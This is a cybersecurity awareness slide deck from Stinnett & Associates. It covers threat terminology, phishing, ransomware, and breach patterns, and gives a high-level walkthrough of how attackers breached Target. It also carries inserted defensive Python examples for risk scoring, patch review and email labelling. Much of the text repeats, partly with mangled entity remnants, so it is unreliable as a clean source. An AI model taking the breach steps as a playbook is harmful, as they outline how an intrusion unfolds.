Operational Technology (OT) ndash The Hardware and software that detects or causes a change through the direct monitoring andor control of physical devices processes and events in the enterprise OT technology and departments are usually found within manufacturing and industrial environments and include industrial control systems (ICS) such as Supervisory Control and Data Acquisition systems(SCADA) OT devices and environments are typically run separately from IT departments These are the devices that communicate with pipelines and electrical grids (and nuclear power plants)
Internet of Things ndash A computing concept that describes the idea of everyday physical devices (DVR systems thermostats refrigerators vehicles) being connected to the internet and being able to identify themselves to other devices which enable the devices to collect and exchange data
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
19
Bot ndash A bot is a software ldquorobotrdquo that performs an extensive set of automated tasks on its own Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network They can also be used by black hats to coordinate attacks by controlling botnets
Botnet ndash A number of Internet-connected devices (eg computers DVR systems and other devices) after being infected with malware each of which is running one or more bots Botnets can be used to perform Distributed Denial Of Service Attack steal data send spam and allow the attacker access to the device and its connection Botnets can be rented out to other hackers or cyber criminals
Denial of Service(DOS) and Distributed Denial of Service ndash A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic A Distributed DOS is the same as a DOS attack but involves multiple computers attacking the network from multiple locations Typically the computers being used are infected with Botnet
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
20
Middleware ndash Software that facilitates exchange of data between two application programs within the same
environment or across different hardware and network environments Three basic types of middleware are (1)
communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place
themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for
themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious
code into a website In SQL Injection the attacker uses SQL language to obtain information back from the
website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of
website
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
21
Common Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
22
Dark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or
means Darknet sites require special software such as TOR (The Onion Router) that helps keep users
anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or
Credit card data as well as Botnet rentals Bitcoins are traded on the Dark web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public
ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing
power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves
solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving
a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash
that is the amount of computing power involved ndash increases
copyStinnett amp Associates LLC
PHISHING
A form of social engineering in which a message typically an email with a malicious
attachment or link is sent to a victim with the intent of tricking the recipient to open an
attachment
23
Spear-Phishing ndash Phishing attacks directed at a specific
individual or company Sub-category of Spear Phishing includes
Cloning (using a previous legitimate email) and Whaling (attacking
a high level executive)
bull CEO Email to Treasurer
bull HR Phishing for Employee Data
bull W2 Phishing Data (IRS Sent out Warning)
The majority of Phishing cases are used as a means to install
Malware onto a host environment
copyStinnett amp Associates LLC
PHISHING
Most companies battle the increase Phishing and spear-phishing attacks by labeling each
external email with some form of the following inserts
24
copyStinnett amp Associates LLC
MALWARE
Malware is short for malicious software Malware is a broad term that encompasses computer
viruses worms Trojan horses spyware adware and now Ransomware Malware is designed
to interfere with normal computer operation usually giving hackers a chance to gain access to
your computer and collect sensitive personal information
25
bull Malware is seen as first access
point used in connection with
hacking attempts
bull Ransomware is the latest version
of Malware that has been in the
headlines and represents one of
the largest cyber threats to most
companies
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
RANSOMWARE
A type of malware that prevents or limits users from accessing their system either by locking the
systems screen or by locking the users files unless a ransom is paid Ransomware typically
encrypts certain file types on infected systems and forces users to pay the ransom through certain
online payment methods to get a decrypt key
26
bull The Use of BITCOINS is typically the
payment method
bull Ransomware attacks quadrupled to 4000
per day from 2015 to 2016
bull This yearrsquos WannaCry Ransomware attack
impacted over 200000 people across 150
countries (included a Worm)
copyStinnett amp Associates LLC
COMMON CYBER ATTACK PATTERNS
bull 78 of all breaches results from these 5
Attack Patterns
- Web App Attacks
- POS Intrusions
- Privilege Misuse
- Cyber-espionage
- Crimeware
63 of all breaches attributable to the top 2 alone
27
Common attack patterns account for a vast majority of documented breaches
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
WEB APP ATTACKS
bull Modern websites with business
functionality increase the impact of a
successful breach
bull Recycled or unchanged default
passwords can compromise an
organizationrsquos security efforts
bull Breaching a web application can
open the gates to internal
applications and code
bull Cross site scripting and SQL
injection are most common attack
attempts
28
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
POINT-OF-SALE (POS) INTRUSIONS
bull Attackers target systems capturing
customer payment information during
legitimate transactions
bull Attacks can exploit POS software or
hardware
bull Attackers commonly target POS
system vendors as a means to exploit
an organizationrsquos POS system
bull Retail and accommodation sites are
experiencing massive POS attacks
29
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
PRIVILEGE MISUSE
bull Internal Parties act (maliciously or
not) in a way to cause a breach
bull Most actors are outside Executive
Management and leadership roles
bull While financial reasons still motivate
most actors espionage has become
an increasingly common motivation
bull Most breaches take months or
longer to discover
30
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBER-ESPIONAGE
bull External Parties (possibly state-
affiliated or organized crime)
infiltrating an organizationrsquos systems
bull Attacks commonly begin through
phishing andor exploiting
backdoors in software (browsers or
even websites)
bull Over 90 of breaches target trade
secrets for exfiltration
31
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CRIMEWARE
bull Crimeware contains any malware or
other incident that focuses directly
on financial opportunity
bull Ransomware keyloggers and use
of backdoors most common
occurrence of Crimeware
bull Crimeware is typically introduced
through the following- Email Attachment
- Cross-site scripting from visited website
- Email Link
32
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
KEY CYBER ATTACKS IN THE NEWS
bull Target Data Breach ndash 70 Million PII Records of Users
and 40 Million Credit Cards Stolen
bull Sony Attack ndash Malware attack that erased over half of
the companyrsquos servers and PCrsquos and released 4
unreleased movies and over 45000 social security
numbers
bull Yahoo Data Breach (20132014) ndash August breach that
exposed PII of 1 billion users 2014 data breach of 500
million users Additional data loss in 2016
bull Prepaid CardATM Scheme (2013) ndash $45 Million Stolen
(worldwide)
bull Bank of Bangladesh (February 2016) ndash $81 Million
Stolen
33
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds

CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE / TECHNOLOGY / PROCESSES
THE PEOPLE CHALLENGE: Humans remain one of the weakest links in the security chain. Ensure you have a strong security awareness training program.
THE TECHNOLOGY CHALLENGE: The increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential.
THE PROCESS CHALLENGE: Ensure best-practice processes and associated management frameworks are in place. Regular audits and reviews are important.

IMPLEMENTING A CYBERSECURITY PROGRAM
• Understand the organizational risk and where high-risk assets exist
• Risk assessments should be performed annually or when significant changes to the environment occur
• Stinnett uses Microsoft STRIDE Threat Modeling to semi-qualitatively measure cybersecurity risks, to identify, estimate and prioritize information security risks
Assessment steps: Identification of Assets → Asset Locations → Classification of Assets → Threat Modeling → Calculated Risk Results

CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Company's information assets:
• What value do the assets have?
  • Credit card data
  • Employee or customer records
  • Bank accounts
  • Intellectual property
  • Trade secrets
  • Insider knowledge
• Who would want the data?
• Data location
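A worked example of the asset-based, STRIDE-driven risk scoring the two slides above describe: the inventory steps (identify, locate, classify, note who would want the data) feed a STRIDE threat list per asset and produce a ranked risk result. This is an added illustration in Python, not Stinnett's methodology or tooling; the 1 to 5 scales, the exposure and classification weights, the formula risk = value × exposure × likelihood, and the inventory itself are all assumptions.

```python
"""Asset inventory -> STRIDE threat list -> ranked risk results.

Added example; not Stinnett's methodology. The scales, weights and the
formula risk = value * exposure * likelihood are assumptions for illustration.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# Microsoft STRIDE threat categories
STRIDE = {
    "S": "Spoofing",
    "T": "Tampering",
    "R": "Repudiation",
    "I": "Information disclosure",
    "D": "Denial of service",
    "E": "Elevation of privilege",
}

# Step "Asset Locations": assumed exposure weight per network location
EXPOSURE = {"internet-facing": 3, "internal": 2, "segregated": 1}

# Step "Classification of Assets": assumed value weight per data classification
CLASSIFICATION_VALUE = {"public": 1, "internal": 2, "confidential": 4, "restricted": 5}


@dataclass
class Asset:
    name: str
    location: str                 # key of EXPOSURE
    classification: str           # key of CLASSIFICATION_VALUE
    wanted_by: str                # "who would want the data" (recorded for the register)
    # Step "Threat Modeling": STRIDE letter -> likelihood 1..5 that the threat materializes
    threats: Dict[str, int] = field(default_factory=dict)


def score_asset(asset: Asset) -> List[Tuple[str, int]]:
    """Return (threat name, risk score) for every STRIDE threat recorded on one asset."""
    if asset.location not in EXPOSURE:
        raise ValueError(f"unknown location {asset.location!r}")
    if asset.classification not in CLASSIFICATION_VALUE:
        raise ValueError(f"unknown classification {asset.classification!r}")
    value = CLASSIFICATION_VALUE[asset.classification]
    exposure = EXPOSURE[asset.location]
    scored = []
    for letter, likelihood in asset.threats.items():
        if letter not in STRIDE or not 1 <= likelihood <= 5:
            raise ValueError(f"bad threat entry {letter}={likelihood}")
        scored.append((STRIDE[letter], value * exposure * likelihood))
    return scored


def prioritize(assets: List[Asset]) -> List[Tuple[str, str, int]]:
    """Step "Calculated Risk Results": every (asset, threat, score), highest risk first."""
    ranked = [(a.name, threat, score) for a in assets for threat, score in score_asset(a)]
    ranked.sort(key=lambda row: (-row[2], row[0], row[1]))
    return ranked


# Constructed inventory (step "Identification of Assets"); not a real company's data
INVENTORY = [
    Asset("Customer PII database", "internal", "restricted", "identity thieves",
          threats={"I": 4, "T": 2, "E": 3}),
    Asset("Vendor invoice portal", "internet-facing", "confidential", "fraudsters",
          threats={"S": 4, "T": 3, "I": 3}),
    Asset("POS servers", "internal", "restricted", "card fraud rings",
          threats={"T": 4, "I": 4}),
    Asset("Marketing website", "internet-facing", "public", "activists",
          threats={"D": 4, "T": 2}),
]


def report(assets: List[Asset], top: int = 5) -> List[str]:
    """Human-readable top-N lines for the risk register."""
    return [f"{score:3d}  {name}: {threat}" for name, threat, score in prioritize(assets)[:top]]


if __name__ == "__main__":
    print("\n".join(report(INVENTORY)))
```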

BASELINE GAP ANALYSIS
• Perform walkthroughs with the information technology department to understand the cybersecurity controls in place
• Evaluate control design as it relates to commonly accepted framework(s)
• Identify control gaps and create a baseline for cybersecurity maturity in the organization

CYBERSECURITY FAILURES AND FIXES
Patch Management – A patch management process is a company's strategy for ensuring that the company's IT devices are properly updated (patched) to reflect the latest software update or release from the vendor. Most companies fail to implement sound patch management processes and procedures; common findings include:
• 99% of exploited vulnerabilities were compromised more than a year after the patch was published
• Companies do not know all of the information devices in their network and therefore are unable to adequately assess their patch management process
User and Administrator-level Access – Companies fail to adequately assess user access levels to ensure that the principle of Least Privilege is applied as much as possible. Within the IT department, the failure of Least Privilege can result in multiple individuals and IDs with access to and/or knowledge of higher-level functions within the environment.
User Cybersecurity Training and Awareness – Companies often fail to implement basic end-user training around cybersecurity. Often the uneducated or untrained end user is the cyber attacker's first entry point into the company.

CYBERSECURITY FAILURES AND FIXES
FIXES
• Obtain at least a basic understanding of your critical information assets, where they are stored and how they are protected
• Perform an inventory of IT devices and assess each device's risk relating to patches
• Focus on higher-risk areas such as internet-facing devices and software with known vulnerabilities (Adobe, Java, browsers, operating systems)
• Perform an inventory of all user and admin IDs. Understand the access each ID has in your environment and why that access level is necessary. Assess whether password levels and parameters are adequate (password length, characters and change interval)
• Implement a continual end-user training program
• Ensure backups and recovery plans work as intended and are properly segregated
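To make the failures and fixes on the two slides above concrete, here is an added Python example (not Stinnett's tooling) that runs three of the reviews the FIXES list calls for over a constructed inventory: patch age per device, weighted by internet exposure and by the software families named on the slide; a privileged-ID review for least privilege; and a password-parameter check. The tiers, the one-year cut-off (chosen to mirror the 99% statistic), the keyword list, the password minimums and every inventory row are assumptions.

```python
"""Patch-age, privileged-ID and password-parameter review over a constructed inventory.

Added example, not Stinnett's tooling. Thresholds, keyword list, password
minimums and all inventory rows are assumptions for illustration.
"""
from datetime import date
from typing import Dict, List, Tuple

TODAY = date(2017, 10, 27)   # fixed so results are reproducible (the presentation date)

# Software families the FIXES slide singles out; assumed keywords, not an official list
KNOWN_TARGETED = ("adobe", "java", "chrome", "firefox", "internet explorer", "windows")

# Constructed device inventory: you cannot assess patch risk for devices you do not know about
DEVICES: List[Dict] = [
    {"host": "web01", "internet_facing": True, "software": "Apache httpd",
     "last_patched": date(2016, 6, 1)},
    {"host": "hr-ws12", "internet_facing": False, "software": "Adobe Reader",
     "last_patched": date(2017, 3, 15)},
    {"host": "db01", "internet_facing": False, "software": "SQL Server",
     "last_patched": date(2017, 9, 30)},
    {"host": "vendor-gw", "internet_facing": True, "software": "Java 8 runtime",
     "last_patched": date(2017, 7, 1)},
]


def patch_risk(device: Dict, today: date = TODAY) -> str:
    """Tier a device by patch age; the one-year line mirrors the slide's 99% statistic."""
    age_days = (today - device["last_patched"]).days
    targeted = any(k in device["software"].lower() for k in KNOWN_TARGETED)
    if device["internet_facing"] and age_days > 365:
        return "critical"
    if age_days > 365 or (age_days > 90 and (device["internet_facing"] or targeted)):
        return "high"
    if age_days > 90:
        return "medium"
    return "ok"


def patch_report(devices: List[Dict], today: date = TODAY) -> List[Tuple[str, str]]:
    """(host, tier) for every device, worst first, so remediation starts at the top."""
    order = {"critical": 0, "high": 1, "medium": 2, "ok": 3}
    rows = [(d["host"], patch_risk(d, today)) for d in devices]
    return sorted(rows, key=lambda r: (order[r[1]], r[0]))


# Constructed user/admin ID inventory; "holders" = number of people who know the credential
USER_IDS: List[Dict] = [
    {"id": "jdoe", "privileged": False, "justification": "", "holders": 1},
    {"id": "svc_backup", "privileged": True, "justification": "backup agent", "holders": 3},
    {"id": "domadmin2", "privileged": True, "justification": "", "holders": 1},
    {"id": "asmith-admin", "privileged": True, "justification": "AD administration", "holders": 1},
]


def review_access(ids: List[Dict]) -> List[Tuple[str, str]]:
    """Least-privilege findings: each privileged ID needs a documented reason and one owner."""
    findings = []
    for entry in ids:
        if not entry["privileged"]:
            continue
        if not entry["justification"].strip():
            findings.append((entry["id"], "privileged ID without documented business need"))
        if entry["holders"] > 1:
            findings.append((entry["id"], f"privileged credential shared by {entry['holders']} people"))
    return findings


# Assumed minimums for the parameters the slide lists (length, character classes, change interval)
PASSWORD_MINIMUMS = {"min_length": 12, "char_classes": 3, "max_age_days": 90}


def check_password_policy(policy: Dict[str, int]) -> List[str]:
    """Compare a domain password policy against the assumed minimums."""
    findings = []
    if policy["min_length"] < PASSWORD_MINIMUMS["min_length"]:
        findings.append(f"minimum length {policy['min_length']} below {PASSWORD_MINIMUMS['min_length']}")
    if policy["char_classes"] < PASSWORD_MINIMUMS["char_classes"]:
        findings.append(f"only {policy['char_classes']} character classes required")
    if policy["max_age_days"] > PASSWORD_MINIMUMS["max_age_days"]:
        findings.append(f"change interval {policy['max_age_days']} days exceeds {PASSWORD_MINIMUMS['max_age_days']}")
    return findings


CURRENT_POLICY = {"min_length": 8, "char_classes": 2, "max_age_days": 180}  # constructed

if __name__ == "__main__":
    for host, tier in patch_report(DEVICES):
        print(f"{tier:8s} {host}")
    for ident, finding in review_access(USER_IDS):
        print(f"ACCESS   {ident}: {finding}")
    for finding in check_password_policy(CURRENT_POLICY):
        print(f"PASSWORD {finding}")
```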

QUESTIONS
www.STINNETT-ASSOCIATES.com | 888.808.1795
Stinnett & Associates, 8811 S Yale Ave, Suite 300, Tulsa, OK 74137
Main Number: 918.728.3300
ContactUs@Stinnett-Associates.com

CYBERSECURITY DEFINED
The body of technologies, processes and practices designed to protect networks, computers, programs and data from attack, damage or unauthorized access.
Cybersecurity is usually considered a sub-set of Information Security, but can require the consideration of:
• Application Security
• Operating System and Network Security
• Usage of specific Intrusion Detection and Prevention software and tools
• User Training and Education
• Disaster Recovery and Business Continuity considerations
• Really anything to help prevent, detect or recover from a cyberattack

CYBER ATTACK DEFINED
The deliberate exploitation of computer systems, technology-dependent enterprises and networks. Cyber attacks can use malicious code, weak passwords or other cyber exploits to gain unlawful access to systems and data, often resulting in disruptive consequences that can compromise data and lead to cybercrimes such as information and identity theft.
Cyber attacks often include the following:
• Identity theft, fraud, extortion
• Malware, pharming, phishing, spamming, spoofing, spyware, Trojans and viruses
• Stolen hardware such as laptops or mobile devices
• Denial-of-service and distributed denial-of-service attacks
• Breach of access
• Password sniffing
• System infiltration
• Website defacement
• Private and public web browser exploits
• Instant messaging abuse
• Intellectual property (IP) theft or unauthorized access

CYBERSECURITY COMMON TERMS AND DEFINITIONS
Information Technology (IT) – The typically corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise; the department within a company that is charged with establishing, monitoring and maintaining information technology systems and services.
Operational Technology (OT) – The hardware and software that detects or causes a change through the direct monitoring and/or control of physical devices, processes and events in the enterprise. OT technology and departments are usually found within manufacturing and industrial environments and include industrial control systems (ICS) such as Supervisory Control and Data Acquisition (SCADA) systems. OT devices and environments are typically run separately from IT departments. These are the devices that communicate with pipelines and electrical grids (and nuclear power plants).
Internet of Things – A computing concept that describes the idea of everyday physical devices (DVR systems, thermostats, refrigerators, vehicles) being connected to the internet and being able to identify themselves to other devices, which enables the devices to collect and exchange data.

CYBERSECURITY COMMON TERMS AND DEFINITIONS
Bot – A bot is a software "robot" that performs an extensive set of automated tasks on its own. Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network. They can also be used by black hats to coordinate attacks by controlling botnets.
Botnet – A number of Internet-connected devices (e.g. computers, DVR systems and other devices), each of which is running one or more bots after being infected with malware. Botnets can be used to perform distributed denial of service attacks, steal data, send spam and allow the attacker access to the device and its connection. Botnets can be rented out to other hackers or cyber criminals.
Denial of Service (DoS) and Distributed Denial of Service – A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic. A distributed DoS is the same as a DoS attack but involves multiple computers attacking the network from multiple locations. Typically the computers being used are infected bots that are part of a botnet.

CYBERSECURITY COMMON TERMS AND DEFINITIONS
Middleware – Software that facilitates the exchange of data between two application programs within the same environment or across different hardware and network environments. Three basic types of middleware are (1) communication middleware, (2) database middleware and (3) system middleware.
Man-in-the-Middle (MITM) Attacks – An attack occurrence where the attacker has been able to place themselves in the middle of communications between two parties. The attacker is able to alter or obtain data for themselves while unknown to the other two parties.
SQL Injection and Cross-site Scripting Attacks – An attack occurrence where the attacker injects malicious code into a website. In SQL Injection, the attacker uses SQL language to obtain information back from the website that was unintended. In Cross-site Scripting, the attacker injects code that only impacts other users of the website.

CYBERSECURITY COMMON TERMS AND DEFINITIONS
Common Vulnerabilities and Exposures (CVE) – A catalog sponsored by Homeland Security that documents known cyber threats. Vulnerabilities are known errors in a system or software that provide an attacker with direct access. Exposures are known errors that allow an attacker indirect access, which may allow the attacker to gather knowledge or content. Many of the malware and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level.
Zero Day Vulnerability/Attack – An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider. Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by the vendor.
Advanced Persistent Threat – A set of stealthy and continuous computer hacking processes, often orchestrated by a person or persons targeting a specific entity.

CYBERSECURITY COMMON TERMS AND DEFINITIONS
Dark Web / Darknet – Websites located on the internet that are not accessible by normal search engines or means. Darknet sites require special software such as TOR (The Onion Router) that helps keep users anonymous. Darknet sites are used for several illegal activities such as black-market purchasing of stolen PII or credit card data as well as botnet rentals. Bitcoins are traded on the dark web.
Bitcoin – A digital currency created in 2009. There are no physical bitcoins, only balances kept on a public ledger in the cloud that, along with all Bitcoin transactions, is verified by a massive amount of computing power. Bitcoin mining is the process through which bitcoins are released to come into circulation; it involves solving a computationally difficult puzzle to discover a new block, which is added to the blockchain, and receiving a reward in the form of a few bitcoins. As more and more bitcoins are created, the difficulty of the mining process (that is, the amount of computing power involved) increases.

PHISHING
A form of social engineering in which a message, typically an email with a malicious attachment or link, is sent to a victim with the intent of tricking the recipient into opening an attachment.
Spear-Phishing – Phishing attacks directed at a specific individual or company. Sub-categories of spear phishing include Cloning (using a previous legitimate email) and Whaling (attacking a high-level executive).
• CEO email to Treasurer
• HR phishing for employee data
• W2 phishing data (IRS sent out a warning)
The majority of phishing cases are used as a means to install malware onto a host environment.

PHISHING
Most companies battle the increase in phishing and spear-phishing attacks by labeling each external email with some form of the following inserts:
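As an added illustration of the external-mail labeling practice described above (example code, not any vendor's gateway rule or the presenter's own), this Python snippet tags the subject of mail that arrives from outside the company and also flags the CEO-to-Treasurer pattern from the previous slide, where an outside address borrows an executive's display name. The internal domain, the executive directory, the tag text and the sample messages are assumptions.

```python
"""Label external e-mail and flag executive display-name impersonation.

Added example; not a vendor's mail-gateway rule or the presenter's code. The
internal domain, the executive directory, the tag text and the sample
messages below are assumptions.
"""
from email import message_from_string
from email.utils import parseaddr
from typing import Dict

INTERNAL_DOMAINS = {"example.com"}        # assumed: the company's own mail domain(s)
EXTERNAL_TAG = "[EXTERNAL]"                # assumed: the subject insert for outside mail
# Assumed directory: executive display name (lower-case) -> their real internal address
EXECUTIVES = {"pat ceo": "pat.ceo@example.com"}


def domain_of(header_value: str) -> str:
    """Lower-cased domain from a header such as 'Pat CEO <pat.ceo@example.com>'."""
    _, addr = parseaddr(header_value)
    return addr.rpartition("@")[2].lower()


def analyze(raw: str) -> Dict[str, object]:
    """Classify one RFC 822 message: external sender? executive impersonation? odd Reply-To?"""
    msg = message_from_string(raw)
    from_hdr = msg.get("From", "")
    name, addr = parseaddr(from_hdr)
    external = domain_of(from_hdr) not in INTERNAL_DOMAINS
    # The slide's "CEO email to Treasurer" case: an outside address wearing an executive's name
    real_addr = EXECUTIVES.get(name.strip().lower())
    impersonated = real_addr if external and real_addr and real_addr.lower() != addr.lower() else None
    # A Reply-To that leaves the sender's domain is another common fraud tell
    reply_to = msg.get("Reply-To")
    reply_mismatch = bool(reply_to) and domain_of(reply_to) != domain_of(from_hdr)
    return {"external": external, "impersonated_executive": impersonated,
            "reply_to_mismatch": reply_mismatch}


def label_message(raw: str) -> str:
    """Prefix the subject of outside mail with EXTERNAL_TAG and add a warning header; idempotent."""
    verdict = analyze(raw)
    if not verdict["external"]:
        return raw
    msg = message_from_string(raw)
    subject = msg.get("Subject", "")
    if not subject.startswith(EXTERNAL_TAG):
        del msg["Subject"]                 # assignment appends in email.message, so drop the old one
        msg["Subject"] = f"{EXTERNAL_TAG} {subject}".strip()
    if verdict["impersonated_executive"] and "X-Impersonation-Warning" not in msg:
        msg["X-Impersonation-Warning"] = f"display name matches {verdict['impersonated_executive']}"
    return msg.as_string()


def subject_of(raw: str) -> str:
    """Subject header of a message string (helper for checking results)."""
    return message_from_string(raw).get("Subject", "")


# Constructed sample messages, not real traffic
SAMPLE_INTERNAL = (
    "From: Alex Treasurer <alex.treasurer@example.com>\n"
    "To: Pat CEO <pat.ceo@example.com>\n"
    "Subject: Q3 numbers\n\n"
    "Draft attached.\n"
)
SAMPLE_SPOOF = (
    "From: Pat CEO <pat.ceo@mail-example.test>\n"
    "Reply-To: pat.ceo@webmail-example.test\n"
    "To: Alex Treasurer <alex.treasurer@example.com>\n"
    "Subject: Urgent wire today\n\n"
    "Are you at your desk? Call me when you see this.\n"
)

if __name__ == "__main__":
    for sample in (SAMPLE_INTERNAL, SAMPLE_SPOOF):
        print(analyze(sample))
        print(label_message(sample))
```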

MALWARE
Malware is short for malicious software. Malware is a broad term that encompasses computer viruses, worms, Trojan horses, spyware, adware and now ransomware. Malware is designed to interfere with normal computer operation, usually giving hackers a chance to gain access to your computer and collect sensitive personal information.
• Malware is seen as the first access point used in connection with hacking attempts
• Ransomware is the latest version of malware that has been in the headlines and represents one of the largest cyber threats to most companies
Source: Verizon Data Breach Investigations Report 2016

RANSOMWARE
A type of malware that prevents or limits users from accessing their system, either by locking the system's screen or by locking the user's files, unless a ransom is paid. Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decryption key.
• The use of bitcoins is typically the payment method
• Ransomware attacks quadrupled to 4,000 per day from 2015 to 2016
• This year's WannaCry ransomware attack impacted over 200,000 people across 150 countries (it included a worm)

COMMON CYBER ATTACK PATTERNS
• 78% of all breaches result from these 5 attack patterns:
  - Web App Attacks
  - POS Intrusions
  - Privilege Misuse
  - Cyber-espionage
  - Crimeware
• 63% of all breaches are attributable to the top 2 alone
Common attack patterns account for a vast majority of documented breaches.
Source: Verizon Data Breach Investigations Report 2016

WEB APP ATTACKS
• Modern websites with business functionality increase the impact of a successful breach
• Recycled or unchanged default passwords can compromise an organization's security efforts
• Breaching a web application can open the gates to internal applications and code
• Cross-site scripting and SQL injection are the most common attack attempts
Source: Verizon Data Breach Investigations Report 2016

POINT-OF-SALE (POS) INTRUSIONS
• Attackers target systems capturing customer payment information during legitimate transactions
• Attacks can exploit POS software or hardware
• Attackers commonly target POS system vendors as a means to exploit an organization's POS system
• Retail and accommodation sites are experiencing massive POS attacks
Source: Verizon Data Breach Investigations Report 2016

PRIVILEGE MISUSE
• Internal parties act (maliciously or not) in a way that causes a breach
• Most actors are outside executive management and leadership roles
• While financial reasons still motivate most actors, espionage has become an increasingly common motivation
• Most breaches take months or longer to discover
Source: Verizon Data Breach Investigations Report 2016

CYBER-ESPIONAGE
• External parties (possibly state-affiliated or organized crime) infiltrating an organization's systems
• Attacks commonly begin through phishing and/or exploiting backdoors in software (browsers or even websites)
• Over 90% of breaches target trade secrets for exfiltration
Source: Verizon Data Breach Investigations Report 2016

CRIMEWARE
• Crimeware covers any malware or other incident that focuses directly on financial opportunity
• Ransomware, keyloggers and use of backdoors are the most common occurrences of crimeware
• Crimeware is typically introduced through the following:
  - Email attachment
  - Cross-site scripting from a visited website
  - Email link
Source: Verizon Data Breach Investigations Report 2016

KEY CYBER ATTACKS IN THE NEWS
• Target Data Breach – 70 million PII records of users and 40 million credit cards stolen
• Sony Attack – Malware attack that erased over half of the company's servers and PCs and released 4 unreleased movies and over 45,000 social security numbers
• Yahoo Data Breach (2013/2014) – August breach that exposed PII of 1 billion users; 2014 data breach of 500 million users; additional data loss in 2016
• Prepaid Card/ATM Scheme (2013) – $45 million stolen (worldwide)
• Bank of Bangladesh (February 2016) – $81 million stolen
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
